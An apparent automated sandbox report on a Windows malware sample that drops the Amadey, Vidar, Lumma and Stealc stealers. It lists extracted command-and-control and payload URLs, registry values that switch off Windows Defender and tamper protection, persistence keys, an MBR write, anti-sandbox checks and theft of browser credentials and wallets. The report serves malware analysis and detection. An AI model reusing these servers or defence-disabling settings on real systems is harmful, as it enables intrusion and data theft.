Analysis
-
max time kernel
279s -
max time network
286s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2025, 18:26
Static task
static1
Behavioral task
behavioral1
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral5
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win11-20250313-en
Behavioral task
behavioral6
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
macos-20241101-en
General
-
Target
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
-
Size
1.8MB
-
MD5
8480b3439f6f2fe71ff8136c8475a0e1
-
SHA1
8f787c424f7a1ac854d26b723008ea29d9f1b1aa
-
SHA256
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8
-
SHA512
2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958
-
SSDEEP
49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
vidar
13.3
11373d37b176b52c098f600f61cdf190
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
lumma
https://6advennture.top/GKsiio
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://5steelixr.live/aguiz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://twxayfarer.live/ALosnz
https://steelixr.live/aguiz
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 37 IoCs
resource yara_rule behavioral3/memory/5196-36-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-35-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-37-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-38-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-53-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-74-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-75-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-85-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-88-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-92-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-93-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-94-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-98-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-99-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-117-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-454-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-455-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-457-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-458-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-461-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-465-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-466-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-470-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-471-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-613-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-834-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-979-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-980-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-983-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-984-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-985-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-987-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-989-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-990-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-2441-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/5196-2444-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral3/memory/1360-2460-0x0000000000A20000-0x0000000000E68000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral3/memory/1360-2461-0x0000000000A20000-0x0000000000E68000-memory.dmp healer behavioral3/memory/1360-2462-0x0000000000A20000-0x0000000000E68000-memory.dmp healer behavioral3/memory/1360-2770-0x0000000000A20000-0x0000000000E68000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ab7380df2b.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ab7380df2b.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ab7380df2b.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ab7380df2b.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2492 created 2560 2492 MSBuild.exe 42 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b842abf8f3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec9a0b61cd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd5d9b8176.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cf533b34eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 74957b3341.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ab7380df2b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 2579 9224 powershell.exe 2905 11572 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 9224 powershell.exe 11572 powershell.exe 4756 powershell.exe 3500 powershell.exe 7516 powershell.exe 9500 powershell.exe 10120 powershell.exe 10888 powershell.exe 10960 powershell.exe 11092 powershell.exe -
Downloads MZ/PE file 27 IoCs
flow pid Process 75 5788 rapes.exe 75 5788 rapes.exe 75 5788 rapes.exe 75 5788 rapes.exe 534 1192 74957b3341.exe 534 1192 74957b3341.exe 534 1192 74957b3341.exe 534 1192 74957b3341.exe 534 1192 74957b3341.exe 534 1192 74957b3341.exe 705 5788 rapes.exe 705 5788 rapes.exe 705 5788 rapes.exe 705 5788 rapes.exe 3566 12980 svchost015.exe 4403 8148 svchost015.exe 62 5788 rapes.exe 629 5788 rapes.exe 668 5788 rapes.exe 588 5788 rapes.exe 588 5788 rapes.exe 588 5788 rapes.exe 627 4980 svchost.exe 27 5788 rapes.exe 622 5788 rapes.exe 2579 9224 powershell.exe 2905 11572 powershell.exe -
Drops file in Drivers directory 4 IoCs
description ioc Process File created C:\Windows\System32\Drivers\6bbb4d94.sys a28245d7.exe File created C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys a28245d7.exe File created C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys a28245d7.exe File created C:\Windows\System32\Drivers\06b074ad.sys a28245d7.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys" a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\06b074ad\ImagePath = "System32\\Drivers\\06b074ad.sys" a28245d7.exe -
Uses browser remote debugging 2 TTPs 25 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4180 msedge.exe 1636 chrome.exe 2004 chrome.exe 5672 msedge.exe 3920 chrome.exe 3652 chrome.exe 5404 chrome.exe 6088 msedge.exe 6024 msedge.exe 5472 chrome.exe 4064 msedge.exe 2952 msedge.exe 3124 chrome.exe 3840 chrome.exe 3612 msedge.exe 5540 msedge.exe 5432 chrome.exe 6368 chrome.exe 6484 chrome.exe 5424 chrome.exe 4900 msedge.exe 5020 chrome.exe 2376 chrome.exe 3784 chrome.exe 4176 msedge.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b842abf8f3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cf533b34eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd5d9b8176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cf533b34eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b842abf8f3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 74957b3341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ab7380df2b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd5d9b8176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ab7380df2b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec9a0b61cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 74957b3341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec9a0b61cd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 2260 w32tm.exe -
Executes dropped EXE 64 IoCs
pid Process 5788 rapes.exe 4880 UYpk7xI.exe 2428 jokererer.exe 5488 b842abf8f3.exe 3608 rapes.exe 4536 ec9a0b61cd.exe 1192 74957b3341.exe 2720 d0fba8cbde.exe 1360 ab7380df2b.exe 3416 jokererer.exe 4404 rapes.exe 5416 UYpk7xI.exe 6444 7IIl2eE.exe 3116 TbV75ZR.exe 2032 Passwords.com 3580 Rm3cVPI.exe 7092 xZRvIQ5.exe 7116 u75a1_003.exe 4992 EPTwCQd.exe 5584 tzutil.exe 2260 w32tm.exe 976 bot.exe 3516 javaruntime_service.exe 6608 javasupport_update.exe 1520 javaplugin_update.exe 6428 javaplatform_update.exe 6796 javaupdater_update.exe 1808 javaruntimew.exe 5200 javaupdaterw.exe 7052 javasupport.exe 4856 javaruntime_service.exe 6388 javaplatformw.exe 1344 javaplugin_update.exe 7112 javaruntime_platform.exe 5940 javaupdater_platform.exe 4492 javasupport.exe 1500 javaplatform_service.exe 1084 javaruntimew.exe 1408 javaplugin_update.exe 3784 javaplugin_update.exe 7248 javasupport_update.exe 7368 javaplatform_service.exe 7412 javaservice_service.exe 7728 javaservice_service.exe 7776 javaservice.exe 7836 javaplatform_service.exe 7884 javasupport_service.exe 7940 javaplatform_service.exe 7984 javasupport.exe 8036 javaupdater_service.exe 8076 javaservice_service.exe 8128 javaruntimew.exe 8180 javaruntime_update.exe 8228 javaplatform_update.exe 8260 javaruntime_platform.exe 8304 javaupdater.exe 8352 javaplatform_platform.exe 8396 javasupport_platform.exe 8432 javaplugin.exe 8496 javaplatform.exe 8528 javaservice_platform.exe 8580 javasupport_service.exe 8640 javaruntime_service.exe 8680 javasupportw.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 74957b3341.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine fd5d9b8176.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine cf533b34eb.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine ab7380df2b.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine b842abf8f3.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine ec9a0b61cd.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys a28245d7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver" a28245d7.exe -
Loads dropped DLL 27 IoCs
pid Process 1192 74957b3341.exe 1192 74957b3341.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features ab7380df2b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ab7380df2b.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplatformw.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplatformw.exe\"" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c5bf7783-86ce-4113-89e9-ac37bfec346c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{10a91c6c-893d-4b92-8721-7595eee6e93f}\\c5bf7783-86ce-4113-89e9-ac37bfec346c.cmd\"" a28245d7.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ec9a0b61cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361710101\\ec9a0b61cd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaservice_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaservice_service.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_service.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9ff7443f7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361870101\\9ff7443f7f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361880121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\74957b3341.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361720101\\74957b3341.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0fba8cbde.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361730101\\d0fba8cbde.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ab7380df2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361740101\\ab7380df2b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaplugin_update.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaplugin_update.exe\"" powershell.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\KasperskyLab a28245d7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: a28245d7.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 a28245d7.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/files/0x0006000000021593-1028.dat autoit_exe behavioral3/files/0x0009000000024be7-30472.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1332 tasklist.exe 2376 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 5788 rapes.exe 5488 b842abf8f3.exe 3608 rapes.exe 4536 ec9a0b61cd.exe 1192 74957b3341.exe 1360 ab7380df2b.exe 4404 rapes.exe 10476 rapes.exe 13160 fd5d9b8176.exe 6588 cf533b34eb.exe 10624 TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE 12232 483d2fa8a0d53818306efeb32d3.exe 3972 rapes.exe 7780 rapes.exe -
